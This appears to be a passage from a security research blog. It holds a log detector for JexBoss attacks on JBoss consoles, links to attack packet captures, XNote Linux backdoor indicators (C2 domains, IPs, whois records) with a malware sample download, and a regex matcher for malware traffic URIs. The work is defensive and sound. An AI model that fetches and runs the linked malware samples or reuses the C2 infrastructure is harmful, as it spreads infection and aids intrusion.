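203.0.113.5 - - [12/Apr/2016:21:58:01 -0400] "HEAD /web-console/ HTTP/1.1" 200 -
203.0.113.5 - - [12/Apr/2016:21:58:02 -0400] "HEAD /invoker/JMXInvokerServlet HTTP/1.1" 200 -
203.0.113.5 - - [12/Apr/2016:21:58:09 -0400] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1432
203.0.113.5 - - [12/Apr/2016:21:58:15 -0400] "GET /jbossass/ HTTP/1.1" 200 2210
198.51.100.7 - - [12/Apr/2016:21:59:00 -0400] "GET /index.html HTTP/1.1" 200 512
198.51.100.9 - - [12/Apr/2016:22:01:00 -0400] "GET /jmx-console/ HTTP/1.1" 401 -
"""


def classify(line):
    """Return a finding dict for a request touching a watched path, else None.

    A GET/HEAD is a probe. A POST to a console or the invoker is treated as
    an exploitation attempt, since console write actions such as deploying an
    application are submitted as form posts. Any request into the jbossass
    context means the toolkit is already deployed. A 2xx answer to a probe
    shows the console is reachable without credentials; 401/403 shows it is
    at least password-protected, which is the first mitigation to verify.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m['path'].split('?', 1)[0]
    component = next((name for prefix, name in WATCHED.items()
                      if path == prefix or path.startswith(prefix + '/')), None)
    if component is None:
        return None
    status = int(m['status'])
    if path.startswith('/jbossass'):
        stage = 'post-exploitation'
    elif m['method'] == 'POST':
        stage = 'exploit-attempt'
    else:
        stage = 'probe'
    return {'src': m['src'], 'ts': m['ts'], 'path': path, 'component': component,
            'stage': stage, 'status': status, 'exposed': 200 <= status < 300}


def summarize(log_text):
    """Return all findings plus a per-source Counter of stages.

    One source moving from probes to an exploit attempt to requests into the
    deployed context within minutes is the sequence shown in the screenshots.
    """
    findings = [f for f in map(classify, log_text.splitlines()) if f]
    per_src = {}
    for f in findings:
        per_src.setdefault(f['src'], Counter())[f['stage']] += 1
    return findings, per_src
```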
<h4 style="text-align: left;">
</h4>
<h4 style="text-align: left;">
Packet Captures</h4>
<div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 6 host: </u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v6_victim_vantage.pcap" target="_blank">jexboss_attack_v6_victim_vantage.pcap</a></div>
<div>
<br /></div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 4 host (remote toolkit fetch):</u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v4a_victim_vantage.pcap" target="_blank">jexboss_attack_v4a_victim_vantage.pcap</a></div>
<div>
<br /></div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and display):</u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v4b_victim_vantage.pcap" target="_blank">jexboss_attack_v4b_victim_vantage.pcap</a></div>
<div>
<u><br /></u></div>
<div>
<u>JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and save to victim host):</u></div>
<div>
<a href="http://files.sempersecurus.org/pcaps/jexboss_attack_v4c_victim_vantage.pcap" target="_blank">jexboss_attack_v4c_victim_vantage.pcap</a></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Posted by Andre M. DiMino.<br />
<br />
<h2>Linux.BackDoor.XNote.1 indicators</h2>
Published 2015-02-09.<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: inherit;">We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.</span><br />
<span style="font-family: inherit;">Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: <a href="http://blog.malwaremustdie.org/" target="_blank">http://blog.malwaremustdie.org/</a></span><br />
<br />
Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote', that opens a backdoor on the compromised host. The host is then used for a variety of functions, including as a DDoS bot.<br />
The DrWeb posts provide a very good analysis of the malware and its overall structure.<br />
<a href="http://news.drweb.com/show/?i=9272&lng=en&c=5" target="_blank">http://news.drweb.com/show/?i=9272&lng=en&c=5</a><br />
<a href="http://vms.drweb.com/virus/?i=4323517" target="_blank">http://vms.drweb.com/virus/?i=4323517</a><br />
<br />
We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.<br />
The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.<br />
<br />
Upon execution, we observed the sample contacting the DNS server at 114.114.114.114 with queries for the following domains:<br />
<br />
<ul style="text-align: left;">
<li>a.et2046.com</li>
<li>b.et2046.com</li>
<li>c.et2046.com</li>
</ul>
Each query returned the IP address <b>122.10.85.54</b>.<br />
<br />
In our run, the malicious 'xnote' process had process ID 1303. Using '<a href="https://github.com/volatilityfoundation/volatility" target="_blank">volatility</a>' to map the process memory, we noted:<br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">Volatility Foundation Volatility Framework 2.4</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">Pid Start End Flags Pgoff Major Minor Inode Path </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xc01000 0xc02000 r-x 0x0 8 1 405848 /home/mattyh/xnote</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0x8048000 0x81ba000 r-x 0x0 0 0 0 </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0x81ba000 0x81c4000 rwx 0x0 0 0 0 </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xa137000 0xa158000 rwx 0x0 0 0 0 [heap] </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xb78b6000 0xb78b7000 r-x 0x0 0 0 0 [vdso] </span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">1303 0xbf843000 0xbf859000 rwx 0x0 0 0 0 [stack]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: inherit;">Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">XXXXXXXXXXXXXXXX122.10.85.54</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">a.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">b.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">c.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e.et2046.com</span><br />
<span style="color: yellow; font-family: Courier New, Courier, monospace;">test</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<br />
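Recovering artifacts from the dumped segments, as described above, is essentially a strings pass followed by indicator extraction; note that memory yielded e.et2046.com, a subdomain never seen in the DNS queries on the wire. The following is an added example, not the post's own tooling: the segment bytes are a constructed stand-in shaped like the listing above (the domain and address values are the post's own), and the filters are written to reject the libc character tables that a raw strings run also returns.

```python
"""Recover network indicators from a dumped process memory segment
(added example, not the post's own tooling)."""
import re

# Constructed stand-in for one dumped segment of the xnote process:
# NUL-separated C strings mixed with binary noise.
SAMPLE_SEGMENT = (
    b'\x7fELF\x01\x01\x01\x00'
    b'XXXXXXXXXXXXXXXX122.10.85.54\x00'
    b'\x00\x00a.et2046.com\x00b.et2046.com\x00c.et2046.com\x00e.et2046.com\x00'
    b'test\x00\x03CAk[S\x00'
    b' !"#$%&\'()*+,-./0123456789:;@ABCDEFGHIJKLMNOPQRSTUVWXYZ\x00'
    b'.,-+xX0123456789abcdef0123456789ABCDEF\x00'
    b'114.114.114.114\x00999.1.1.1\x00libc.so.6\x00'
)

# Hostname: dotted labels ending in an alphabetic TLD, not glued to other
# word characters or dots (rejects 'libc.so.6' and the digit tables).
HOST_RE = re.compile(
    r'(?<![\w.-])((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63})(?![\w.-])',
    re.I)
# IPv4 with octets 0-255. A digit lookbehind instead of \b lets a match start
# right after padding such as 'XXXX...122.10.85.54' while still rejecting
# '999.1.1.1' (no valid address may begin inside a longer digit run).
IPV4_RE = re.compile(
    r'(?<!\d)(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)(?!\d)')


def extract_strings(blob, min_len=4):
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    return [s.decode('ascii') for s in pattern.findall(blob)]


def extract_indicators(blob):
    """Hostnames and IPv4 addresses found in the segment, deduplicated and
    sorted so two dumps of the same process can be diffed."""
    hosts, ips = set(), set()
    for s in extract_strings(blob):
        hosts.update(h.lower() for h in HOST_RE.findall(s))
        ips.update(m.group(0) for m in IPV4_RE.finditer(s))
    return {'hosts': sorted(hosts), 'ips': sorted(ips)}
```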
<h3 style="text-align: left;">
<span style="font-family: inherit;">Domain and IP Information:</span></h3>
<div>
<div>
It is interesting to note that the domain "<b>et2046.com</b>" has been seen before in other Linux ELF malware.</div>
<div>
<ul style="text-align: left;">
<li>Note <a href="http://ubuntuforums.org/showthread.php?t=2226673" target="_blank">this post</a> to an Ubuntu forum from May 2014, where the subdomains '<b>kill.et2046.com</b>' and '<b>sb.et2046.com</b>' were noted in a running process on a compromised Ubuntu host.</li>
<li>Palo Alto Networks <a href="http://researchcenter.paloaltonetworks.com/2014/07/iptables-backdoor-even-linux-risk-intrusion/" target="_blank">discusses these same domains</a> in their post from July 16, 2014.</li>
<li>Malware Must Die <a href="https://lh3.googleusercontent.com/-oJn44n_-rTs/U-JD9aJD1UI/AAAAAAAAQa0/ehKTVDEcfUU/s1576/001.png" target="_blank">posted an analysis</a> of the Linux iptablex malware where these domains were also seen.</li>
<li>Via VirusTotal searches, we find malware related to these domains:</li>
</ul>
</div>
</div>
<div>
<a href="https://www.virustotal.com/en/domain/sb.et2046.com/information/">https://www.virustotal.com/en/domain/sb.et2046.com/information/</a></div>
<div>
<a href="https://www.virustotal.com/en/domain/kill.et2046.com/information/">https://www.virustotal.com/en/domain/kill.et2046.com/information/</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Obtaining passive DNS information from Farsight Security's DNSDB, we see that the only current DNS record for IP address 122.10.85.54 is:</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">www.qtol.tv.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>122.10.85.54</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: inherit;">Additional information from DNSDB for the domain et2046.com:</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">count<span class="Apple-tab-span" style="white-space: pre;"> </span>54</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">first seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-12 17:13:42 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">last seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2015-01-13 17:23:33 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>a.dnspod.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>b.dnspod.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>c.dnspod.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">count<span class="Apple-tab-span" style="white-space: pre;"> </span>329</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">first seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2013-12-17 17:13:33 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">last seen in zone file<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-11 17:12:29 -0000</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>ns155.dnsever.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>ns165.dnsever.com.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">et2046.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>NS<span class="Apple-tab-span" style="white-space: pre;"> </span>ns179.dnsever.com</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: inherit;">Note that the malware uses a hardcoded DNS server at 114.114.114.114 for all domain resolution, bypassing whatever resolver the host is configured with. This is a public DNS server based in China, with its web page at www.114dns.com.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdi9-JycBY2zOUjKgRrkbAKv-wui3jem5r8feZPkfQHtrboNhf2ejqCzk0AgoBpH53z5z89QxdykaWF9mn09uMGmDy0VPpiqWypXAvZS3eqTQPbP_ZJxDcFv4Z1gBn9XO7ct5g4DZNUWA/s1600/dns_114.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdi9-JycBY2zOUjKgRrkbAKv-wui3jem5r8feZPkfQHtrboNhf2ejqCzk0AgoBpH53z5z89QxdykaWF9mn09uMGmDy0VPpiqWypXAvZS3eqTQPbP_ZJxDcFv4Z1gBn9XO7ct5g4DZNUWA/s1600/dns_114.jpg" height="281" width="320" /></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<h3 style="text-align: left;">
<i><u>whois - 114.114.114.114</u></i></h3>
<div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">inetnum: 114.114.0.0 - 114.114.255.255</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">netname: XFInfo</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: NanJing XinFeng Information Technologies, Inc.</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: Xuanwu District, Nanjing, Jiangsu, China</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">country: CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">irt: IRT-CNNIC-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">address: Beijing, China</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: ipas@cnnic.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">abuse-mailbox: ipas@cnnic.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">person: Yan Jian</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">nic-hdl: YJ1777-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: jyan@greatbit.com</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">person: Zhao Zhenping</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">nic-hdl: ZZ2094-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: ping@greatbit.com</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<h3 style="text-align: left;">
<i><u><span style="font-family: inherit;"><b>whois- 122.10.85.54</b></span></u></i></h3>
<div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">inetnum: 122.10.80.0 - 122.10.95.255</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">netname: TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">descr: Royal Network Technology Co., Ltd. in Guangzhou</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">country: HK</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">admin-c: WX2631-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">tech-c: WX2631-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">status: ASSIGNED NON-PORTABLE</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-by: MAINT-CN-TOINTER122</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-irt: IRT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">changed: tengdayx@gmail.com 20150112</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">source: APNIC</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">irt: IRT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">address: Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: abuse@gzroyal.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">abuse-mailbox: abuse@gzroyal.cn</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">admin-c: RNTC1-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">tech-c: RNTC1-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">auth: # Filtered</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-by: MAINT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">changed: hm-changed@apnic.net 20140919</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">source: APNIC</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">person: Wei XeiJun</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">address: Liwan District of Guangzhou, Guangdong Fangcun West 533</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">country: CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">phone: +86.1234567890</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">e-mail: tengdayx@qq.com</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">nic-hdl: WX2631-AP</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">mnt-by: MAINT-TOINTER-CN</span></div>
<div>
<span style="color: yellow; font-family: Courier New, Courier, monospace;">changed: tengdayx@qq.com 20150111</span></div>
<div>
<br /></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<h3 style="text-align: left;">
<span style="font-family: inherit;"><i><u><b>'whois' for Domain et2046.com</b></u></i></span></h3>
<div>
<div>
<span style="color: yellow; font-family: inherit;">Domain Name: ET2046.COM</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registry Domain ID: 1762221508_DOMAIN_COM-VRSN</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar WHOIS Server: whois.godaddy.com</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar URL: http://www.godaddy.com</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Update Date: 2014-08-25T06:58:17Z</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Creation Date: 2012-11-27T14:02:55Z</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar Registration Expiration Date: 2016-11-27T14:02:55Z</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar: GoDaddy.com, LLC</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar IANA ID: 146</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar Abuse Contact Email: abuse@godaddy.com</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar Abuse Contact Phone: +1.480-624-2505</span></div>
<div>
<span style="color: yellow;"><br /></span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registry Registrant ID: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Name: smaina smaina</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Organization: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Street: Beijing</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant City: Beijing</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant State/Province: Beijing</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Postal Code: 100080</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Country: China</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Phone: +86.18622222222</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Phone Ext: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Fax: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Fax Ext: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Email: tuhao550@gmail.com</span></div>
<div style="text-decoration: underline;">
<br /></div>
</div>
<div style="text-decoration: underline;">
<br /></div>
<div style="text-decoration: underline;">
-----------------------------------------------------------------------------------------------------------------------</div>
<div>
<h3 style="text-align: left;">
<span style="font-family: inherit;">Analysis Files</span></h3>
<a href="https://files.deependresearch.org/malware/Linux_xnote1_F374D1561E553A4C5B803E1D9D15A34E-samp.zip" target="_blank">Malware - f374d1561e553a4c5b803e1d9d15a34e</a></div>
<div>
(Uses same password scheme as Contagio. Ping me or Mila for details if needed)</div>
<div>
<br /></div>
</div>
<div>Posted by <a href="http://www.blogger.com/profile/07255414624107506662">Andre M. DiMino</a></div>
<h3 style="text-align: left;">Library of Malware Traffic Patterns</h3>
<div><i>Published 2015-02-05; updated 2015-02-05.</i></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: #f1c232;"><b>Update February 2015 </b></span><br />
<i>Use the new link below for a new interface and updates.</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzS7IFYkKqSs-QIhIJ9dxlstc6ym9Nzt1dmBYu8hGNgGXfGdz5bAJ3bGjuqWSifizfl8i5sUT1JNpM2Gi1Cjv-qhVek5XqcPYpFQTV2tB6fZGntUbmQjngZQfuyZ8KczXN8rvH3jZK5is/s1600/walker2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzS7IFYkKqSs-QIhIJ9dxlstc6ym9Nzt1dmBYu8hGNgGXfGdz5bAJ3bGjuqWSifizfl8i5sUT1JNpM2Gi1Cjv-qhVek5XqcPYpFQTV2tB6fZGntUbmQjngZQfuyZ8KczXN8rvH3jZK5is/s1600/walker2.png" height="176" width="320" /></a></div>
Traffic analysis has been the primary method of malware identification, and the thousands of IDS signatures developed for it are the daily proof. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features if you don't have access to a well-designed and constantly updated malware database. This started as a "personal notes" spreadsheet of GET and POST requests for different malware families, with information from open sources. We decided others might find it useful too.<br />
<br />
Click on the column headers to see recent entries. Use the other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might contain spaces inserted for easier cell wrapping; remove them if you export the data.<br />
Yes, you can download the samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and the corresponding links to the download location. Use the "Contagio" password scheme (email Mila or admin at deependresearch.org).<br />
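The point of the spreadsheet is that family-specific URI shapes are recognisable on sight, and the same shapes can drive a first-pass matcher over proxy logs. The following is an added example (not the page's tooling) that lifts a handful of rows from the table below (Zemot, Cidox/Rerdom, Gholee, Upatre, Cryptowall 3.0, Andromeda, Dalexis, the Asprox download) into regexes and runs them over constructed log lines. Where a row shows a single literal, the regex generalises it, and each such generalisation, together with the log format itself, is an assumption marked in a comment.

```python
"""Match proxy/web log lines against malware URI patterns.

Added example, not the page's own tooling: the patterns come from the table
rows (Zemot, Cidox/Rerdom, Gholee, Upatre, Cryptowall 3.0, Andromeda, Dalexis,
Asprox); where a row shows one literal, the regex generalises it and that
generalisation is an assumption marked in the comment. The log format and the
log lines are constructed for the example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Pattern:
    family: str
    methods: frozenset                   # HTTP methods the family is seen with
    path: re.Pattern                     # regex over path + query
    host: Optional[re.Pattern] = None    # optional regex over the Host
    confidence: str = "high"             # how much weight a lone hit deserves


PATTERNS = [
    Pattern("Zemot", frozenset({"GET"}), re.compile(r"^/b/shoe$")),
    # table shows /catalog/159; the \d+ is an assumption
    Pattern("Zemot DL via Asprox", frozenset({"GET"}),
            re.compile(r"^/catalog/\d+$"), confidence="low"),
    # table shows 24-hex-char IDs under eve/letr/opt/req; generalised here
    Pattern("Cidox / Rerdom / Clickfraud", frozenset({"GET"}),
            re.compile(r"^/b/(?:eve|letr|opt|req|pkg)/[0-9A-Fa-f]{24}$")),
    Pattern("Dalexis Loader", frozenset({"GET"}),
            re.compile(r"/pack\.tar\.gz$"), confidence="medium"),
    # c= and r= lengths generalised from the two rows in the table
    Pattern("Gholee / Rocket Kitten", frozenset({"GET", "POST"}),
            re.compile(r"^/index\.php\?c=[A-Za-z0-9]{8}&r=[0-9a-f]{6}$")),
    # no real jQuery release is numbered 1.41.15, so the filename alone is telling
    Pattern("Upatre", frozenset({"GET"}),
            re.compile(r"^/js/jquery-1\.41\.15\.js(?:\?|$)")),
    # Tor2web / I2P gateway hosts as in the table; the host is the signal
    Pattern("Cryptowall 3.0", frozenset({"POST"}),
            re.compile(r"^/[a-z0-9]+$"),
            host=re.compile(r"(?:\.i2p|\.torforall\.com)$")),
    # /ldr.php on its own is a weak signal; confirm with the POST body
    Pattern("Andromeda", frozenset({"POST"}),
            re.compile(r"^/ldr\.php$"), confidence="low"),
]

# Constructed log format: <ts> <src_ip> <method> <host> <path> "<user-agent>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+)")


def classify(line: str):
    """Return [(family, confidence), ...] for every pattern the line matches."""
    m = LOG_RE.match(line)
    if not m:
        return []
    return [(p.family, p.confidence) for p in PATTERNS
            if m["method"] in p.methods
            and p.path.search(m["path"])
            and (p.host is None or p.host.search(m["host"]))]


def scan(lines):
    """Group hits by source IP: {src: [(family, confidence, path), ...]}."""
    report = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        for family, conf in classify(line):
            report[m["src"]].append((family, conf, m["path"]))
    return dict(report)


# Constructed sample: a few infected-looking hosts plus one benign request.
LOG = """\
2015-02-04T09:58:12Z 10.0.0.15 GET 198.51.100.7 /b/shoe "Mozilla/4.0"
2015-02-04T09:58:40Z 10.0.0.15 GET 198.51.100.7 /b/eve/e91425775cc5d7e657bd2cc7 "Mozilla/4.0"
2015-02-04T10:01:03Z 10.0.0.22 POST 203.0.113.9 /ldr.php "Mozilla/4.0"
2015-02-04T10:02:17Z 10.0.0.22 GET 203.0.113.9 /js/jquery-1.41.15.js?get_message=3290013886 "-"
2015-02-04T10:03:30Z 10.0.0.31 POST payto4gtpn5czl2.torforall.com /ofs20c "-"
2015-02-04T10:04:02Z 10.0.0.40 GET www.example.com /js/jquery-1.11.2.min.js "Mozilla/5.0"
2015-02-04T10:05:11Z 10.0.0.40 GET www.example.com /index.php?c=Ud7atknq&r=17117d "Mozilla/5.0"
"""

if __name__ == "__main__":
    for src, hits in scan(LOG.splitlines()).items():
        for family, conf, path in hits:
            print(f"{src:12s} {family:30s} [{conf}] {path}")
```

The confidence field is the caveat a table like this needs: `/ldr.php` or `/catalog/159` will also appear on perfectly ordinary sites, so a lone low-confidence hit is a lead to pivot on (same host seen with a second family, odd User-Agent, periodic beaconing), not a verdict, whereas the bogus jQuery version or a Tor2web gateway host is close to self-evident.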
<span style="color: #cccccc; font-size: x-small;">Image credit: Jay Walker Library. Src.Vancouversun</span><br />
<h4 style="text-align: center;">
<a href="http://deependdata.blogspot.com/2015/01/malware-traffic-patterns-2015.html">VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"</a></h4>
<h4 style="text-align: center;">
<span style="text-align: left;"> List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)</span></h4>
<div>
<br />
